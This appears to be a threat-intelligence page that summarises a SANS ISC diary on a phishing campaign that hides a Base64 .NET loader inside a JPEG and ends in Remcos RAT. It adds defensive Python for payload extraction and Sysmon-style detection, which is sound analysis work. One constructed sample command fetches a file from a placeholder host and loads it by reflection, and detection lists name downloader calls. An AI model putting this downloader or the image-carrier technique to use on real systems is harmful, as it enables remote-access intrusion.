Another day, another malicious JPEG, (Mon, Feb 23rd)
In his last two diaries, Xavier discussed recent malware campaigns that download JPEG files with embedded malicious payloads [1,2]. At that point in time I had not come across the malicious “MSI image” myself, but while I was going over malware samples caught by one of my customer's e-mail proxies during the last week, I found another campaign in which the same technique was used.
AI Analysis
Technical Summary
The campaign starts with phishing e-mails that use spoofed sender addresses and embedded company logos to look legitimate. The attachment is a 1.17 MB JScript file delivered in a GZIP envelope; most of its bulk is thousands of repeated junk lines intended to defeat static detection. On execution the script copies itself to the user's Startup folder for persistence, then builds a PowerShell command line carrying a Base64-encoded script and launches it through WMI's Win32_Process.Create method rather than as a direct child process.

The PowerShell stage downloads an image from a URL that was already dead at analysis time. The file carries a .png extension but is a JPEG; its content, not its name, is what the loader cares about. A Base64-encoded payload is embedded in the image; the script extracts and decodes it, loads it with reflection (so it is a .NET assembly) and invokes its Main method with arguments that point it at the user's Downloads folder and at command-line execution. A second URL serves a text file holding a reversed, Base64-encoded executable; once un-reversed and decoded it is Remcos RAT, a commercially sold remote-access trojan that is widely abused by criminals. Obfuscation is layered throughout: split strings, inserted garbage strings and Base64 at every stage.

The messages fail SPF and DMARC, so a gateway that enforces the spoofed domain's DMARC policy can quarantine them. The diary's indicators of compromise are the two download URLs and hashes for the JScript, the encoded TXT and the decoded EXE. The chain is a multi-stage loader combining social engineering, a script dropper and an image file used as a carrier for the next stage; this is hiding in plain sight inside a file type that filters tend to wave through, not steganography in the strict sense.
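As an added example (not code from the diary, and not the malware's own loader), the following Python reproduces the two decoding steps the analysis describes: identifying the container by magic bytes rather than by extension, pulling a Base64 payload out of an image by locating the longest run of Base64-alphabet characters, and un-reversing the second-stage text before decoding it. The image, the "PE" and the second-stage text are constructed inside the block and are not samples from the campaign. The page does not say which markers the real loader uses to find its payload, so the extraction keys on the alphabet run instead of on markers; because "reversed and Base64-encoded" leaves the order ambiguous, the decoder tries both orders and keeps the one that yields a PE header.

```python
"""Extract a Base64 payload embedded in an image and decode a reversed
Base64 second stage. Added example; not code from the ISC diary."""
from __future__ import annotations

import base64
import binascii
import re


def image_type(blob: bytes) -> str:
    """Identify the container by magic bytes; the file extension is untrusted."""
    if blob.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if blob.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    return "unknown"


def find_embedded_base64(blob: bytes, min_len: int = 64) -> bytes | None:
    """Return the longest run of Base64-alphabet bytes of at least min_len.
    Compressed image data almost never sustains such a run, so the run is
    the embedded text regardless of where in the file it was placed."""
    pattern = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    runs = pattern.findall(blob)
    return max(runs, key=len) if runs else None


def b64decode_lenient(data: bytes) -> bytes | None:
    """Repair missing padding; reject anything that is not valid Base64."""
    data = data.rstrip(b"=")
    data += b"=" * (-len(data) % 4)
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and 'PE\\0\\0' at the offset stored in e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_from_image(blob: bytes) -> bytes | None:
    run = find_embedded_base64(blob)
    return b64decode_lenient(run) if run else None


def decode_reversed_stage(text: bytes) -> tuple[str, bytes] | None:
    """The second stage is 'reversed and Base64-encoded'; the order is
    ambiguous, so try both and keep whichever yields a PE image."""
    attempts = {
        "reverse-then-b64decode": lambda t: b64decode_lenient(t[::-1]),
        "b64decode-then-reverse": lambda t: (b64decode_lenient(t) or b"")[::-1],
    }
    for name, fn in attempts.items():
        out = fn(text.strip())
        if out and looks_like_pe(out):
            return name, out
    return None


def build_fake_pe() -> bytes:
    """Constructed MZ/PE stub, not a real binary: e_lfanew points at 'PE\\0\\0'."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(dos) + b"PE\x00\x00" + b"constructed sample, not a real binary"


FAKE_PE = build_fake_pe()
STAGE1_B64 = base64.b64encode(FAKE_PE)
# Constructed JPEG: SOI/APP0 header, 512 bytes of filler "image data", the
# Base64 payload, then the EOI marker. Not a sample from the campaign.
FAKE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(256)) * 2
              + STAGE1_B64 + b"\xff\xd9")
# Constructed second stage: the Base64 text reversed, as the TXT URL would serve it.
STAGE2_TXT = STAGE1_B64[::-1]

if __name__ == "__main__":
    print("container:", image_type(FAKE_IMAGE))
    stage1 = extract_from_image(FAKE_IMAGE)
    print("stage 1 is PE:", looks_like_pe(stage1))
    order, stage2 = decode_reversed_stage(STAGE2_TXT)
    print("stage 2 decoded via", order, "- PE:", looks_like_pe(stage2))
```

On a real sample, feed the downloaded image to `extract_from_image` and the TXT body to `decode_reversed_stage`; if the longest alphabet run is not the payload (for instance because the loader splits it), lower `min_len` or search for the loader's markers once they are known from the script.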
Potential Impact
Organizations anywhere can be hit: the chain ends in Remcos RAT, which gives the operator persistent remote access, arbitrary command execution, data theft and a foothold for further malware. Obfuscated scripts and a payload carried inside an image file get past signature-based antivirus and simple attachment filters. A successful infection can lead to data breaches, intellectual-property theft, operational disruption and lateral movement from the compromised workstation. The vector is e-mail to end users, so organizations with weak attachment controls or little phishing awareness are the most exposed, and the Startup-folder copy survives reboots, so access persists until the script is removed. Spoofed sender addresses and embedded logos raise the chance that a recipient opens the attachment, particularly where the impersonated companies operate. No widespread exploitation has been reported, but the download infrastructure was at least partly live when the samples were analysed, and the payload is a known, fully featured RAT.
Mitigation Recommendations
1. Honour SPF, DKIM and DMARC on inbound mail and enforce the sender domain's DMARC policy; these messages already fail SPF and DMARC, so quarantining on that basis stops them before a user sees them.
2. Filter attachments for script types (.js, .jse, .vbs, .wsf, .hta), including inside compressed envelopes such as GZIP and ZIP; a 1.17 MB script file is itself an anomaly worth blocking.
3. Use EDR behavioural rules for script hosts (wscript.exe, cscript.exe) launched from mail clients or temp paths, for PowerShell started with an encoded command, and for PowerShell whose parent is WmiPrvSE.exe, which is what Win32_Process.Create produces.
4. Stop scripts from running out of e-mail and download locations: change the default handler for .js/.jse/.vbs files from Windows Script Host to Notepad, and restrict script execution with AppLocker or WDAC. PowerShell's execution policy is not a security boundary (commands passed on the command line, encoded or not, are not subject to it), so rely on Constrained Language Mode, script block logging and application control instead.
5. Block the campaign's URLs and domains at the web proxy or DNS layer.
6. Train users to recognise phishing, in particular spoofed sender addresses and unexpected attachments.
7. Audit the per-user and all-users Startup folders, Run keys and scheduled tasks for unauthorised persistence.
8. Feed the IoCs (file hashes and URLs) into detection tooling through threat intelligence feeds.
9. Detonate suspicious attachments in a sandbox before delivery. The first-stage URL was already dead during analysis, so a sandbox may see only a failed download and must judge the script by its behaviour (Startup copy, WMI process creation, encoded PowerShell) rather than by the final payload.
10. Keep tested backups and an incident-response plan ready to recover from an infection.
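The following is an added example, not from the diary, of the behavioural checks in items 3, 4 and 7 applied to constructed Sysmon-style events: a script host started on a file in a temp path, a .js written to the Startup folder, and powershell.exe spawned by WmiPrvSE.exe (the provider host that services Win32_Process.Create) with an -EncodedCommand that decodes to a reflective downloader. The event layout, paths and the encoded script are constructed for the example and the JScript is assumed to run under wscript.exe as a .js attachment would. The detection treats the parent process, not the image name, as the WMI signal, and it resolves the -e/-enc/-EncodedCommand prefixes while excluding -ExecutionPolicy, so a benign `-ExecutionPolicy Bypass -File` invocation raises nothing.

```python
"""Behavioural checks for the chain described above, run over constructed
Sysmon-style events. Added example; not code from the ISC diary."""
from __future__ import annotations

import base64
import re

# -EncodedCommand may be abbreviated to any unique prefix (-e, -ec, -enc, ...);
# the lookahead keeps -ExecutionPolicy from matching.
ENC_ARG = re.compile(r"-e(?!x)[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\appdata\\roaming\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
# Fragments a reflective downloader is likely to contain once decoded.
SUSPICIOUS_PS = ("reflection.assembly", "::load(", "downloaddata",
                 "downloadstring", "frombase64string", ".invoke(")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str | None:
    """-EncodedCommand carries Base64 of the UTF-16LE script text."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> list[str]:
    findings = []
    image = basename(ev.get("Image", ""))
    if ev["EventType"] == "ProcessCreate":
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image in SCRIPT_HOSTS and any(p in cmd.lower() for p in USER_WRITABLE):
            findings.append("script host running a script from a user-writable path")
        # Win32_Process.Create runs the new process under the WMI provider host,
        # so the parent is WmiPrvSE.exe rather than the script that asked for it.
        if image in ("powershell.exe", "pwsh.exe") and parent == "wmiprvse.exe":
            findings.append("powershell spawned via WMI (parent WmiPrvSE.exe)")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits = [s for s in SUSPICIOUS_PS if s in decoded.lower()]
            if hits:
                findings.append("encoded command contains " + ", ".join(hits))
    elif ev["EventType"] == "FileCreate":
        target = ev.get("TargetFilename", "").lower()
        if STARTUP_DIR in target and target.endswith(SCRIPT_EXT):
            findings.append("script file written to the Startup folder")
    return findings


def analyze_events(events: list[dict]) -> list[tuple[int, str]]:
    return [(i, f) for i, ev in enumerate(events) for f in analyze_event(ev)]


# Constructed sample script and events; not captured from the campaign.
SAMPLE_SCRIPT = ("$d=(New-Object Net.WebClient).DownloadData('http://example.invalid/logo.png');"
                 "[Reflection.Assembly]::Load($d)")
ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
STARTUP = "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "CommandLine": 'wscript.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.js"'},
    {"EventType": "FileCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetFilename": STARTUP + "invoice.js"},
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + ENC},
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for idx, finding in analyze_events(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Each rule on its own is noisy in an enterprise (administrators do run encoded PowerShell, and WMI does spawn processes legitimately); correlating two or more findings on the same host within a short window, as this chain produces, is what makes the alert actionable.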
Affected Countries
Czech Republic, United States, Brazil, Romania, Germany, United Kingdom, France, Canada, Australia, Netherlands
Technical Details
- Article source: https://isc.sans.edu/diary/rss/32738 (fetched 2026-02-23T13:37:21Z; about 1,200 words)
Threat ID: 699c5811be58cf853b908718
Added to database: 2/23/2026, 1:37:21 PM
Last enriched: 2/23/2026, 1:37:37 PM
Last updated: 2/24/2026, 1:43:37 AM